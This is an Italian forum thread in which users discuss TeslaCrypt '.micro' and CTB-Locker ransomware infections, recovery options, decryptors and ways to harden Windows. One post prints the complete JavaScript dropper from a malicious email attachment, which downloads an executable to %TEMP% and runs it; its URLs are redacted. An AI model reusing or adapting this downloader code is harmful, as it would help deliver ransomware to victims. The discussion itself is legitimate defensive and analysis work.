"%localappdata%\*\*\*.*" con livello di sicurezza non consentito.

Ovviamente al posto di localappdata puoi mettere le directory che vuoi ma a me sotto win8.1 e win10 ignora il comando se non metto esplicitamente il percorso e non capisco perchè.

Se la policy è consentire devi blacklistare esplicitando tutto quel che non vuoi.
Se la policy è non consentire puoi whitelistare semplicemente le cartelle. Sottocartelle e files "ereditano" l'impostazione.

toh... parli del diavolo...

oggi una bella sorpresa... +100GB della cartella comune tutti belli criptati..

tutti i file rinominati ".micro"


ora sto recuperando i backup di ieri...

un bel sfacelo.

.micro, sorpresa di oggi anche per me (da un cliente)

attenzione mail con più destinatari, zip da 2kb e corpo della mail con la sola data e ora con AM o PM

toh... parli del diavolo...

oggi una bella sorpresa... +100GB della cartella comune tutti belli criptati..

tutti i file rinominati ".micro"


ora sto recuperando i backup di ieri...

un bel sfacelo.

Cavolacci.....

Sempre tramite mail "farlocca" e annesso allegato?

Hai letto il post successivo?

Cavolacci.....

Sempre tramite mail "farlocca" e annesso allegato?

purtroppo non ho capito da dove è arrivato..

Avrei bisogno di un'informazione. Colpito da il tesla con estensione .micro si spera che in futuro questo virus venga bucato come sembrerebbe successo per le vecchie versioni. Metto da parte tutti i file criptati in attesa... Ma devo salvare anche altro? Esistono dei file che possono servire per la futura decriptazione? Ho notato che il software TeslaDecoder cerca una decryption key. Non vorrei quindi cancellare la chiave che se potrebbe servire dopo!

Grazie

Stessa situazione ma su quella macchina sono d' accordo di installare con Windows 10 visto che è supportato dal produttore.
Perciò nuovo disco e il disco vecchio si mette da parte.

Aiutatemi vi prego

Aiutatemi vi prego

io ho fatto un backup con acronis, di tutta la cartella corrotta...

non si sa mai, che un giorno voglia avere il tempo di verificarla con uno di quei software che decriptano.


fallo anche tu, no?

io ho fatto un backup con acronis, di tutta la cartella corrotta...

non si sa mai, che un giorno voglia avere il tempo di verificarla con uno di quei software che decriptano.


fallo anche tu, no?

Mi sembra di aver capito che non bastano i file corrotti ma anche la chiave che dovrebbe essere nel registro di configurazione o un file nel sistema.

Mi sembra di aver capito che non bastano i file corrotti ma anche la chiave che dovrebbe essere nel registro di configurazione o un file nel sistema.

allora non so ... prendi direttamente tutto il disco o la sua immagine se non puoi prenderlo fisicamente.

il report di trendmicro di ieri

28/01/2016 16.09.06 nomecomputer Unauthorized File Encryption mitkjhe45.exe c:\documents and settings\nomeutente\dati applicazioni\ Real-time Scan Unable to quarantine the file. Refer to the online help for solutions.

Purtroppo anch'io mi trovo ad affrontare questo virus.
Ma esiste almeno un software per rimuoverlo?
Ho provato Malwarebytes e Norton Power Eraser ma non trovano nulla.
SpyHunter non serve a niente perchè devi pagarlo.

Dite che non ne vale la pena?
Volevo pulire prima di riformattare per paura di portarmi dietro il file di posta e dei vari backup di alcuni programmi di contabilità, ancora dopo la formattazione e il ripristino degli stessi mi ritrovo con il pc infetto.

TeslaCrypt 3.0 :

http://www.tgsoft.it/italy/news_archivio.asp?id=683

anche questo bloccato menomale da Eset Antivirus 9.0

TeslaCrypt 3.0 :

http://www.tgsoft.it/italy/news_archivio.asp?id=683

anche questo bloccato menomale da Eset Antivirus 9.0

arrivata oggi a mio padre in una casella gmail , finita in spam dove mio padre nemmeno guarda :D

la mail si presenta proprio come indicato nell'articolo con il fatidico allegato yQB.zip

dentro allo zip un file javascript chiamato invoice_scan_QWNGfH.js (il downloader)

aperto il file js con un editor di testo SCITE senza eseguirlo

var STATUS_OK = 200;
var METHOD_GET = "GET";
var METHOD_EXEC = "Exec";
var W_SCRIPT_SHELL = "WScript.Shell";
var MSXML2_XMLHTTP = "MSXML2.XMLHTTP";
var ADODB = "ADODB";
var STREAM = "Stream";
var TEMP_ENV = "%TEMP%\\";
var EXE_EXTENSION = ".exe";
var MIN_FILE_SIZE = 20000;

var URLS = ["linkrimosso","linkrimosso"];
var FILE_NAME = 35184372088832;


var wShell = WScript.CreateObject(W_SCRIPT_SHELL);
var httpRequest = WScript.CreateObject(MSXML2_XMLHTTP);
var stream = WScript.CreateObject(ADODB+"."+STREAM);

var tmpDir = wShell.ExpandEnvironmentStrings(TEMP_ENV);
var storedFilePathName = tmpDir + FILE_NAME + EXE_EXTENSION;


for (var v = 0; v < URLS.length; v++) {
try {
var url = URLS[v];
httpRequest.open(METHOD_GET, url, false);
httpRequest.send();
if (httpRequest.status == STATUS_OK) {
try {
stream.open();
stream.type = 1;
stream.write(httpRequest.responseBody);
if (stream.size > MIN_FILE_SIZE) {
v = URLS.length;
stream.position = 0;
stream.saveToFile(storedFilePathName, 2);
}
} finally {
stream.close();
}
}
}
catch (ignored) {
}
}
wShell[METHOD_EXEC](tmpDir + Math.pow(2, 45));



il file js viene riconosciuto dai seguenti antivirus

https://www.virustotal.com/it/file/ea83f58ba3184f42673bfdff2518520b9691d7cb10451914edaef5e51abc6d50/analysis/1454166039/

non va meglio per l'exe che ho scaricato a parte tramite WGET

https://www.virustotal.com/it/file/59d952bca474e60df15dde61474a832bf6ac63b7cc7211fcfca2a584bd4f0474/analysis/1454166179/

Se avete spento il PC appena dopo l' infezione, avviate Norton Power Erase in modalità provvisoria con rete e fate la scansione proposta e nella sezione avanzata quella con il cloud.

Quando ha terminato la scansione e rimosso qualche schifezza nei file temporanei (compresi quelli di internet) riavviate e vedete se si sono attivate le copie shadow che inizialmente erano disabilitate.
Forse vi è rimasto qualcosa
:D
altrimenti
:cry:

AVVISO A TUTTI

METTETE IL DOMINIO skuawill.com NEL VOSTRO FILE HOSTS

E' UN DEPOSITO DI VARI MALWARE RANSOMWARE

quindi

127.0.0.1 *.skuawill.com

??

quindi

127.0.0.1 *.skuawill.com

??

127.0.0.1 skuawill.com
o anche
127.0.0.1 www.skuawill.com

però non so se basta ad evitare che qualcosa scarichi dal sito tramite link tipo skuawill.com/virusnumerato.exe

127.0.0.1 skuawill.com
127.0.0.1 www.skuawill.com

vanno messi entrambi

guardate fin dove aveva impestato questo maledetto virus

http://s21.postimg.org/5n6ojz0mr/impestato.jpg (http://postimg.org/image/5n6ojz0mr/)

la SYSVOL di un paio di DC...

guardate fin dove aveva impestato questo maledetto virus

http://s21.postimg.org/5n6ojz0mr/impestato.jpg (http://postimg.org/image/5n6ojz0mr/)

la SYSVOL di un paio di DC...

bene.
La prox generazione modificherà direttamente le gpo :D

buona giornata a tutti.
Qualcuno sa se a partire dall'indirizzo bitcoin si può risalire alla privatekeybc o alla privatekeyfile? (se si forse ho un'idea su come fare il culo al ransomware che mette le estensioni punto micro). Faccio presente che ad oggi io e i bitcoin siamo stati su distinti piani dell'universo...

bene.
La prox generazione modificherà direttamente le gpo :D

Con cosa lo hai rilevato?

scusate ragazzi, per non leggere tutte le pagine ma se uno si becca questo virus può recuperare i dati anche parzialmente ?, perchè ho notato che il virus ha eliminato anche i punti di ripristino!!!

Con cosa lo hai rilevato?

a chi lo stai chiedendo?

se a me: io uso trendmicro worry free adv

scusate ragazzi, per non leggere tutte le pagine ma se uno si becca questo virus può recuperare i dati anche parzialmente ?, perchè ho notato che il virus ha eliminato anche i punti di ripristino!!!

no, una volta criptato NON recuperi nulla.

no, una volta criptato NON recuperi nulla.
li mortacci loro:muro:
ma non c'è in nessun modo la possibilità ?

li mortacci loro:muro:
ma non c'è in nessun modo la possibilità ?

pagando, forse.

Ciao a tutti.

Un'amica si è trovata con tutti i file convertiti con estensione .micro e criptati. In ognuna delle cartelle utente è apparso un file html con queste istruzioni.
http://i.imgur.com/fvLSQ2M.jpg

Immagino sia il temuto cryptlocker e ovviamente i file sono molto importanti e da recuperare. Da quello che ho capito poco si può fare. Aggiungo inoltre che ho provato a seguire queste istruzioni http://spywarecure.com/it/rimuovere-virus-estensione-file-micro/ che dovrebbero essere piuttosto aggiornate (25/01/16) ma non mi è stato possibile identificare il processo del virus nel task manager e neppure trovare la chiave meryHmas.

Qualsiasi aiuto sarebbe prezioso.

Grazie.

Ciao a tutti.

Un'amica si è trovata con tutti i file convertiti con estensione .micro e criptati. In ognuna delle cartelle utente è apparso un file html con queste istruzioni.
http://i.imgur.com/fvLSQ2M.jpg

Immagino sia il temuto cryptlocker e ovviamente i file sono molto importanti e da recuperare. Da quello che ho capito poco si può fare. Aggiungo inoltre che ho provato a seguire queste istruzioni http://spywarecure.com/it/rimuovere-virus-estensione-file-micro/ che dovrebbero essere piuttosto aggiornate (25/01/16) ma non mi è stato possibile identificare il processo del virus nel task manager e neppure trovare la chiave meryHmas.

Qualsiasi aiuto sarebbe prezioso.

Grazie.

ciao anche ad un mio amico tutti i file sono stati cambiati in estensione .micro

hai aggiornamenti?
sai qualcosa come recuperare i dati?
grazie ciao!

Io invece mi sono fatto dare il file da un amico che aveva ricevuto l'email, per testarlo in macchina virtuale per vedere dove si va a mettere e fare dei test di rimozione manuale, la cosa che mi ha stupito pur avendo la connessione attiva e senza antivirus apro il file e dopo qualche secondo il processo si chiude riavvio riprovo come admin niente non cripta niente, a questo punto ho pensato che usi dei sistemi per rivelare gli ambienti virtuali.... qualcuno ha povato ad eseguire in VM?

Al momento sembra ci sia solo Tesla Decoder (http://www.bleepingcomputer.com/forums/t/576600/tesladecoder-released-to-decrypt-exx-ezz-ecc-files-encrypted-by-teslacrypt/) che possa decriptare i files.
L'unica limitazione dell'attuale versione è che non è ancora pronto per l'ultima versione di TeslaCrypt 3.0 che cripta e modifica le estensioni dei vari files con .micro

Al'interno del file zip di chi lo scaricherà ci sono tutte le istruzioni (in inglese) per la procedura

Ciao,

ma questo @BloodDolly che su BleepingComputer.xom pare riesca a trovare le chiavi di criptazione, si fa pagare o fa tutto gratis, avete una qualche esperienza a riguardo?

http://www.bleepingcomputer.com/forums/t/575875/new-teslacrypt-version-released-that-uses-the-exx-extension/page-14?hl=%2Btesla#entry3906365

bye

Io sono iscritto, da infettato che sono stato.
Da quello che ho capito è lo sviluppatore dell'app, chiedono di caricare i files .micro criptati in modo che lui li possa studiare per poter implementare la sua app e farle risolvere anche le problematiche ".micro"
L'app è gratuita, nessuno ti chiede nulla

Per chi è stato infettato da una versione precedente del virus ed i files criptati risultassero però con estensione .vvv ecc, c'è proprio un team che, una volta che hai caricato un paio di files criptati, ti trovano la chiave di decriptazione da usare con l'app e te la inviano per PM (se hai difficoltà ad usare l'app)
Non mi risulta che nessuno chieda soldi

http://www.bleepingcomputer.com/forums/t/604094/help-recover-instructions-files-everywhere/#entry3925046

http://www.bleepingcomputer.com/forums/t/604094/help-recover-instructions-files-everywhere/#entry3925046

Sicuramente più chiaro ;)

Gnao!

Ciao a tutti!
Mi allego a questa allegra brigata di infetti .micro.
E con ieri sera sono arrivato a nove pc infetti con solo due soluzioni possibili: formattone o pagare.
Ho letto tutte le 37 pagine ma non ho trovato la risposta a queste mie due domande:
Il virus TeslaCrypt infetta tutti i sistemi operativi senza distinzione tra Windows, Mac e Linux?
Collegando un disco o una rete aziendale al pc infetto questo enumera i dischi di rete e li infetta tutti?
Tesla mi arriva via mail, l'utonto cerca di aprire lo zip allegato ( scr o cab ecc ecc) e si infetta il pc: la criptatura dei files è eseguita una volta sola oppure ogni "tot" riparte il controllo dei files da infettare?

Ieri sera mi sono collegato in remoto ad un pc infetto tramite teamviewer ( pc infetto windows7 enterprise edition, XUbuntu 15.0 sul mio), apparentemente dopo due ore di connessione sembra che sul mio non sia successo nulla :tie: (sgrat sgrat)



Grazie a tutti
GAb

Tranqui, sono 3 giorni che sono su PC infetti con teamviewer, nessun problema.

Per il resto delle domande non so dirti

Gnao!

Ciao a tutti!
Mi allego a questa allegra brigata di infetti .micro.
E con ieri sera sono arrivato a nove pc infetti con solo due soluzioni possibili: formattone o pagare.
Ho letto tutte le 37 pagine ma non ho trovato la risposta a queste mie due domande:
Il virus TeslaCrypt infetta tutti i sistemi operativi senza distinzione tra Windows, Mac e Linux?
Collegando un disco o una rete aziendale al pc infetto questo enumera i dischi di rete e li infetta tutti?
Tesla mi arriva via mail, l'utonto cerca di aprire lo zip allegato ( scr o cab ecc ecc) e si infetta il pc: la criptatura dei files è eseguita una volta sola oppure ogni "tot" riparte il controllo dei files da infettare?

Ieri sera mi sono collegato in remoto ad un pc infetto tramite teamviewer ( pc infetto windows7 enterprise edition, XUbuntu 15.0 sul mio), apparentemente dopo due ore di connessione sembra che sul mio non sia successo nulla :tie: (sgrat sgrat)



Grazie a tutti
GAb

Funziona solo su Windows, se disattivi i javascript in teoria lo blocchi, se usi un firewall vero (non quel cesso di WindowsFirewall) dovrebbe bloccare la connessione in entrata in teoria.
Se paghi non è detto che ti forniscano i dati di decriptazione, abbiamo a che fare con malviventi della peggior specie.
Formattare mi sembra eccessivo, già il combofix dalla modalità provvisoria elimina il teslacrypt, poi una passata col malwarebyte fa il resto, poi appunto si può usare il ccleaner per eliminare le voci all'avvio in "esecuzione automatica" che ti visualizzano sempre i messaggi di riscatto, e per eliminare la miriade di file duplicati che crea il malware.
Se un pc è infetto è meglio non collegarlo ad una rete aziendale equivale a suicidarsi, bisognebbe scollegare il disco della macchina infetta e collegandolo ad un altro pc fargli una scansione approfondita.

bye

Gnao!

Grazie ragazzi per le vostre dritte:mano: :vicini:
Incomincio subito a metterle in pratica... ma prima ho una quantità industriale di files da eliminare.

Grazie!

Gnao
Gab

arrivata oggi a mio padre in una casella gmail , finita in spam dove mio padre nemmeno guarda :D

la mail si presenta proprio come indicato nell'articolo con il fatidico allegato yQB.zip

dentro allo zip un file javascript chiamato invoice_scan_QWNGfH.js (il downloader)

aperto il file js con un editor di testo SCITE senza eseguirlo
vorrei chiedervi una info nel caso incautamente si aprisse uno di questi files .js
se lo faccio con un account amministratore è sicuro che mi becco il virus, ma nel caso lo facessi con un account standard succederebbe lo stesso ?

Gnao!

Ciao a tutti!
Mi allego a questa allegra brigata di infetti .micro.
E con ieri sera sono arrivato a nove pc infetti con solo due soluzioni possibili: formattone o pagare.


Potresti metterti in contatto con l'utente BloodDolly su BleepingComputer, uno slovacco che pare riesca a trovare le chiavi di criptazione di questi malware, e con un opportuno software il Tesladecoder.zip a ripristinare i file criptati.

bye

vorrei chiedervi una info nel caso incautamente si aprisse uno di questi files .js
se lo faccio con un account amministratore è sicuro che mi becco il virus, ma nel caso lo facessi con un account standard succederebbe lo stesso ?

Un account standard può modificare i file all'interno di un pc, se Windows fosse fatto bene, i file dell'account dell'Admin non dovrebbero esser toccati, se fosse fatto bene. :rolleyes:

Ci fidiamo?

http://windows.microsoft.com/it-it/windows/why-standard-user-account#1TC=windows-7

bye

Un account standard può modificare i file all'interno di un pc, se Windows fosse fatto bene, i file dell'account dell'Admin non dovrebbero esser toccati, se fosse fatto bene. :rolleyes:

Ci fidiamo?

http://windows.microsoft.com/it-it/windows/why-standard-user-account#1TC=windows-7

bye
quindi non concluderei nulla....?, il file .js sarebbe eseguito lo stesso con effetti deleteri ?
cioè il virus lo avrei beccato lo stesso ?
ma l'account standard in definitiva aiuta ad avere un pò più di sicurezza ?

Ciao,

in teoria sì, molte operazioni sono bloccate come dice il link sopracitato, potresti anche usare un accouny "Guest":

Account Guest

Anche Windows 8.1 prevede la possibilità di abilitare l’account guest sul proprio computer (o tablet) tramite il pannello di controllo: questo tipo di account, ancora più ristretto rispetto all’account standard, prevede il semplice utilizzo del dispositivo e di alcuni programmi in esso installato senza alcun margine di personalizzazione (non sarà possibile cambiare lo sfondo, né la combinazione di colori né altro).

L’account guest non richiede password d’accesso ed è l’ideale per permettere a chiunque di utilizzare il proprio PC o tablet senza il rischio di incappare in danni indesiderati (ad esempio per i PC da esposizione, usando il cosiddetto kiosk mode).


bye

quindi non concluderei nulla....?, il file .js sarebbe eseguito lo stesso con effetti deleteri ?
cioè il virus lo avrei beccato lo stesso ?
ma l'account standard in definitiva aiuta ad avere un pò più di sicurezza ?

se crei semplicemente gli account non risolvi nulla

se invece dopo che hai creto gli account, restringi i permessi alle cartelle dove tieni i file dell'account admin, l'utente standard anche se prenderà il virus non potrà cryptare i file presenti in quelle cartelle, questo permette di salvare i file dei diversi account

se crei semplicemente gli account non risolvi nulla

se invece dopo che hai creto gli account, restringi i permessi alle cartelle dove tieni i file dell'account admin, l'utente standard anche se prenderà il virus non potrà cryptare i file presenti in quelle cartelle, questo permette di salvare i file dei diversi account
questo l'ho già fatto infatti se dall'account standard vado nella cartella dell'amministratore non mela fa aprire

detto questo non ho ancora capito se dall'account standard apro il file .js prendo il virus ?

l'account standard è abilitato ad eseguire gli aggiornamenti di windows update ?

questo l'ho già fatto infatti se dall'account standard vado nella cartella dell'amministratore non mela fa aprire

detto questo non ho ancora capito se dall'account standard apro il file .js prendo il virus ?

l'account standard è abilitato ad eseguire gli aggiornamenti di windows update ?

questi virus non hanno necessità di installarsi hanno un solo compito criptare i dati mostrandoti alla fine il messaggio ricattatorio

ovviamente cripteranno tutti i file previsti nella loro programmazione in tutte le cartelle a cui hanno accesso in base ai privilegi dell'account in cui si eseguono

se hai dischi esterni collegati o dischi di rete andranno anche lì a sfrucugliare

idem per partizioni diverse dalla C, se ad esempio ogni account può accedere alla partizione D allora è irrilevante in quale account viene eseguito

l'unico modo per essere sicuri è che non vengano eseguiti in nessun account

non so fino a quanto l'utente guest protegga, ha sicuramente meno privilegi di scrittura

cioè se l'utente guest ha la facoltà di scrivere solo nella sua cartella documenti del suo profilo e lì non ci sono file da criptare allora si limitano i danni

questo l'ho già fatto infatti se dall'account standard vado nella cartella dell'amministratore non mela fa aprire

detto questo non ho ancora capito se dall'account standard apro il file .js prendo il virus ?

l'account standard è abilitato ad eseguire gli aggiornamenti di windows update ?

se apri il .js e guardi cosa fa, capisci che si scarica un exe con l'utenza che sta usando.
Quindi con l'utenza che ha lanciato il .js (e quindi scarica ed esegue l'.exe) cripta tutto ciò a cui l'utente ha accesso in scrittura/modifica.

Vuoi una protezione minima, ma che potrebbe farti qualche problema?
Cambia l'associazione per i file .js. Fai che si aprano col blocco note.

La "cattiveria" di teslacrypt è che un utente non deve stare attento solo ai "pericolosi" .exe, ma anche agli sconosciuti ".js".

se apri il .js e guardi cosa fa, capisci che si scarica un exe con l'utenza che sta usando.
Quindi con l'utenza che ha lanciato il .js (e quindi scarica ed esegue l'.exe) cripta tutto ciò a cui l'utente ha accesso in scrittura/modifica.

Vuoi una protezione minima, ma che potrebbe farti qualche problema?
Cambia l'associazione per i file .js. Fai che si aprano col blocco note.

La "cattiveria" di teslacrypt è che un utente non deve stare attento solo ai "pericolosi" .exe, ma anche agli sconosciuti ".js".
beh questa è proprio una bella idea!!!!:D , grazie

io ho scaricato qualche sample del cbt :D per fare delle prove a casa
I documenti dell'account admin non sono stati criptati facendo partire il malware dall'utente standard, ma non ho avuto modo/tempo di provare altro

I problemi li ho annusati in dominio: qualcuno deve averlo preso , e infettato random alcuni file (pochi per fortuna) sparsi in tutte le cartelle del server dati.
Il punto è: nessun singolo utente standard ha i diritti di accesso a tutte le cartelle... non so che pensare..

io ho scaricato qualche sample del cbt :D per fare delle prove a casa
I documenti dell'account admin non sono stati criptati facendo partire il malware dall'utente standard, ma non ho avuto modo/tempo di provare altro

I problemi li ho annusati in dominio: qualcuno deve averlo preso , e infettato random alcuni file (pochi per fortuna) sparsi in tutte le cartelle del server dati.
Il punto è: nessun singolo utente standard ha i diritti di accesso a tutte le cartelle... non so che pensare..
il test l'hai eseguito su macchina virtuale?

io ho scaricato qualche sample del cbt :D per fare delle prove a casa
I documenti dell'account admin non sono stati criptati facendo partire il malware dall'utente standard, ma non ho avuto modo/tempo di provare altro

I problemi li ho annusati in dominio: qualcuno deve averlo preso , e infettato random alcuni file (pochi per fortuna) sparsi in tutte le cartelle del server dati.
Il punto è: nessun singolo utente standard ha i diritti di accesso a tutte le cartelle... non so che pensare..
sarebbe interessante a proposito di test provare, con il sample cbt, il metodo indicato da Dane, se si dovesse risolvere sarebbe il TOP

dove si scaricano i smple del cbt ?

I problemi li ho annusati in dominio: qualcuno deve averlo preso , e infettato random alcuni file (pochi per fortuna) sparsi in tutte le cartelle del server dati.
Il punto è: nessun singolo utente standard ha i diritti di accesso a tutte le cartelle... non so che pensare..

basta poco per avere permessi non uniformi.
Se sposti un file piuttosto che copiarlo è probabile che sul file rimangono i permessi originali, nella nuova posizione. Quindi è più che possibile che il ransomware abbia avuto accesso ad alcuni files "a caso".

sarebbe interessante a proposito di test provare, con il sample cbt, il metodo indicato da Dane, se si dovesse risolvere sarebbe il TOP

dove si scaricano i smple del cbt ?

Non è una soluzione TOP. E' una soluzione accrocchio che dovrebbe funzionare, ma che potrebbe anche fare cilecca, come darti problemi "a caso".
Non ti serve un sample cbt per fare la prova. Apri il blocco note e scrivici qualcosa dentro. Salvalo e rinominalo come .js. Metti il .js in una cartella zip e prova a simulare il comportamento di un utonto. Prima senza aver cambiato l'applicazione predefinita per .js, poi avendola cambiata.

Il metodo funziona se il file viene aperto con il blocco note piuttosto che con qualche interprete javascript.

Ovviamente ti risolve solo per l'estensione .js. Non per .vbs, .bat, .lnk, .jar, ecc ecc

il test l'hai eseguito su macchina virtuale?

no ;)


.....

dove si scaricano i smple del cbt ?

forum stranieri (seri... almeno, così mi sembrano), devi comunque essere registrato per scaricarli.
Ad ogni buon conto se ti interessano davvero per scopi di studio te li indico, solo in pvt, anche se poi io stesso li ho trovati tramite google...

Il metodo funziona se il file viene aperto con il blocco note piuttosto che con qualche interprete javascript.

Ovviamente ti risolve solo per l'estensione .js. Non per .vbs, .bat, .lnk, .jar, ecc ecc

Ma poi è salutare modificare l'apertura dei .js, quanti software utilizzano tali script? :rolleyes:


bye

ps: oggi ho rimosso un altro teslacrypt 3.0, ci ho messo di più a rimuovere i quasi 5000 file del riscatto che a rimuovere il malware stesso, che è di banale eliminazione.

Ma poi è salutare modificare l'apertura dei .js, quanti software utilizzano tali script? :rolleyes:


hai provato a cercare nel pc quanti file .js hai? :D

Sul pc è un conto, ma quando navighi utilizzi normalmente javascript per i siti più comuni, bloccandoli o modificandone l'apertura si possono avere problemi di navigazione.


bye

hai provato a cercare nel pc quanti file .js hai? :D
azz pure questo è vero!

no ;)


ah ok l'ho chiesto perchè a me su VM non funziona come ho scritto nel mio post
http://www.hwupgrade.it/forum/showpost.php?p=43342754&postcount=720

Sul pc è un conto, ma quando navighi utilizzi normalmente javascript per i siti più comuni, bloccandoli o modificandone l'apertura si possono avere problemi di navigazione.


bye

ok. Può essere e non ho provato/non ho intenzione di provare, perchè uso altre tecniche.
Però i javascript dei siti, di solito, non se li processano i motori javascript dei browser?

ok. Può essere e non ho provato/non ho intenzione di provare, perchè uso altre tecniche.
Però i javascript dei siti, di solito, non se li processano i motori javascript dei browser?

In teoria sì, rinominare un .js non so quanto serva, anzi avere un buon antivirus ed un firewall che blocchi la connesione in uscita o entrata, no?

bye

In teoria sì, rinominare un .js non so quanto serva, anzi avere un buon antivirus ed un firewall che blocchi la connesione in uscita o entrata, no?

bye


Non ho parlato di rinonimare i files .js. In effetti non serve a nulla.
L'idea è di non usare windows scripting host per i files .js, ma qualcosaltro tipo notepad, cambiando l'associazione dei files (apri con....).

Vuoi essere ragionevolmente sicuro? Non è difficile.
- Tieniti un utente amministratore con cui installi il software e fai amministrazione di sistema. Usa un'utenza limitata per l'uso normale del pc, e configurala in modo che può eseguire esclusivamente i software installati dall'altro utente. E niente altro. Configurarlo bene è una pigna, però protegge non poco.
- Se usi qualche filtraggio dei siti visitati tipo adblock, abilita anche le liste di siti "pericolosi". Andrebbero bene anche filtri sul dns....roba molto banale.
- Metti browser e client di posta in emet.
- Metti un firewall per le connessioni in ingresso, anche minimale va bene.
- se credi ancora alle favole, metti un antivirus.

Non ho parlato di rinonimare i files .js. In effetti non serve a nulla.
L'idea è di non usare windows scripting host per i files .js, ma qualcosaltro tipo notepad, cambiando l'associazione dei files (apri con....).

Vuoi essere ragionevolmente sicuro? Non è difficile.
- Tieniti un utente amministratore con cui installi il software e fai amministrazione di sistema. Usa un'utenza limitata per l'uso normale del pc, e configurala in modo che può eseguire esclusivamente i software installati dall'altro utente. E niente altro. Configurarlo bene è una pigna, però protegge non poco.
- Se usi qualche filtraggio dei siti visitati tipo adblock, abilita anche le liste di siti "pericolosi". Andrebbero bene anche filtri sul dns....roba molto banale.
- Metti browser e client di posta in emet.
- Metti un firewall per le connessioni in ingresso, anche minimale va bene.
- se credi ancora alle favole, metti un antivirus.
chiaro e forte;)

Altro giro altra corsa... mercoledì altro infettato con CTB-locker, variante falsa fattura telecom. Riscatto richiesto 3BTC, non pagato. Tanta sfortuna perché avevano sempre fatto backup regolari del gestionale, fino al 12 gennaio, quando con l'ultimo aggiornamento del software gli si è incriccato il modulo di backup del database. Stavano aspettando che la softwarehouse gli risolvesse il problema, quando per errore hanno avviato il tutto.
E' la prima volta che mi capita che una variante del CTB riesca a cryptare anche i files di un database SQL in esecuzione su server.
Robe da matti. Rimane il guaio comunque che facevano il backup solo del database, tutto il resto no (anche se il resto della roba era il classico materiale di importanza relativa, quello che è molto meglio se ce l'hai, ma puoi vivere anche senza).
Ovviamente quando mi hanno chiamato ho provato tutte le possibilità, non ultima contattare drweb, ma nisba, anche sul web ancora non si trova nulla per questo. Ho fatto un clone dell'hard disk su immagine, di modo da averlo a disposizione se in futuro dovesse sbloccarsi qualcosa sul fronte decrypt (dubito ahinoi).
La cosa terribile è che evidentemente si è criptata roba di SQL e del sistema, che serviva nel processo di disinstallazione. Praticamente dopo n tentativi di estirpare la vecchia installazione del gestionale, ho deciso che mi ci voleva meno a reinstallare tutto da zero. E in effetti così è stato.
L'impatto della cosa è stato piuttosto drammatico, quindi ancora una volta suggerisco a tutti di fare sempre il backup se possibile.

Non ho parlato di rinonimare i files .js. In effetti non serve a nulla.
L'idea è di non usare windows scripting host per i files .js, ma qualcosaltro tipo notepad, cambiando l'associazione dei files (apri con....).

Vuoi essere ragionevolmente sicuro? Non è difficile.

Ma io non parlavo di me, parlavo per tutte le altre persone che non ci capiscono una mazza di informatica, che aprirebbero al volo allegati con .exe, .pif, .js, ecc. ecc. ecc. .

Quindi educhi le persone a cosa è pericoloso e cosa no, o mi fai un OS come si deve che non si faccia infinocchiare dal primo hacker di turno, perchè costoro potevano cancellarli i file anzichè crittografarli, possiamo blindarlo Windows, ma non servirà a nulla sei il frescone di turno clicca su quello che non deve cliccare, se riceve una mail senza guardare chi è il vero mittente (perchè ad esempio Outlook Express non ti fa vedere la e-mail normalmente, ma solo il nome del mittente, il testacrypt lo ricevi con l'intestazione di un amico ma col @dominio di chissà dove), se apri un sito fasullo dell' Enel .ru e scarichi un file zippato con dentro un bel .exe.

Gli antivirus fanno acqua da tutte le parti, lo so bene, e più si va avanti e più si vedono le inadeguatezze che lasciano.

Proprio ora, mi ha scritto Eset dicendomi:

"ESET al momento rileva ogni variante del Teslacrypt ed è in grado di eliminarlo. Discorso diverso è per il recupero dei dati, stiamo lavorando su un algoritmo in grado di decodificarli, ma non possiamo fornire tempistiche per il rilascio di un tool efficace. Ad oggi le soluzioni attuabili sono quelle di verificare le copie shadow di Windows dei file o di recuperare i file da eventuali backup".

Mi prendono per il culo, quando ho un file .eml (una mail) con dentro un allegato zippato al cui interno c'è un .js ed il Nod32 9.xx non mi trova nulla, oppure un altro zippato con dentro .exe non mi è stato riconosciuto la prima volta da un Eset Nod32 8.xx, inviatogli il file tramite il loro servizio, dopo qualche minuto il file zippato con l'.exe risultava magicamente "sospetto" nemmeno un virus vero e proprio. Inviati i file a VirusTotal riconosciuti tutti, ma i motori vari dei vari produttori di antivirus, chiamano i malware riconosciuti in modo diverso, quindi tra di loro non si parlano, o non ci capiscono niente ed ognuno si fa gli affari propri, bel mondo. :rolleyes:

bye

ps: ho provato a scompattare il file zippato con dentro l'.exe, una presunta bolletta dell'Enel in formato pdf, l'eseguibile ha l'icona di un file pdf, ma con estensione . exe, BASTARDIII!!! ;)

ragazzi sarebbe molto utile se ognuno che ha avuto esperienze in merito postasse una lista di antivirus che non permettono al virus di insediarsi.

Ciao,

presto fatto, questo è il responso di VirusTotal, se gli invio un file .eml con dentro un allegato .zip al cui interno c'è un file .js:

AVG JS/Downloader.Agent 20160205
Arcabit HEUR.JS.Trojan.b 20160205
Avira JS/Nemucod.aipbca 20160205
BitDefender JS:Trojan.JS.Downloader.CB 20160205
Cyren JS/Downldr.DB!Eldorado 20160205
ESET-NOD32 JS/TrojanDownloader.Nemucod.DU 20160205
Emsisoft JS:Trojan.JS.Downloader.CB (B) 20160205
F-Secure JS:Trojan.JS.Downloader.CB 20160205
Fortinet JS/Nemucod.DS!tr 20160205
GData JS:Trojan.JS.Downloader.CB 20160205
Ikarus Trojan-Downloader.Script.CryptoWall 20160205
Kaspersky Trojan-Downloader.JS.Agent.hnp 20160205
McAfee JS/Nemucod.bw 20160205
MicroWorld-eScan JS:Trojan.JS.Downloader.CB 20160205
Microsoft TrojanDownloader:JS/Swabfex 20160205
NANO-Antivirus Trojan.Script.Agent.dzzghx 20160205
Rising JS:Attention.APT-Bait.DisguisedAsDocument/Heur!1.A325 [F] 20160205
Sophos Mal/DrodZp-A 20160205
TrendMicro JS_NEMUCOD.XYZV 20160205
TrendMicro-HouseCall JS_NEMUCOD.XYZV 20160205

da qui in poi il file inviato ha solo il segno di spunta, significa che il malware viene riconosciuto da questi antivus, ma non so perchè non viene specificato il nome dello stesso:

ALYac 20160205
Ad-Aware 20160205
AegisLab 20160205
Agnitum 20160204
AhnLab-V3 20160204
Alibaba 20160204
Antiy-AVL 20160205
Avast 20160205
Baidu-International 20160204
Bkav 20160204
ByteHero 20160205
CAT-QuickHeal 20160205
CMC 20160205
ClamAV 20160204
Comodo 20160204
DrWeb 20160205
F-Prot 20160129
Jiangmin 20160205
K7AntiVirus 20160205
K7GW 20160205
Malwarebytes 20160205
McAfee-GW-Edition 20160205
Panda 20160204
Qihoo-360 20160205
SUPERAntiSpyware 20160205
Symantec 20160204
TheHacker 20160203
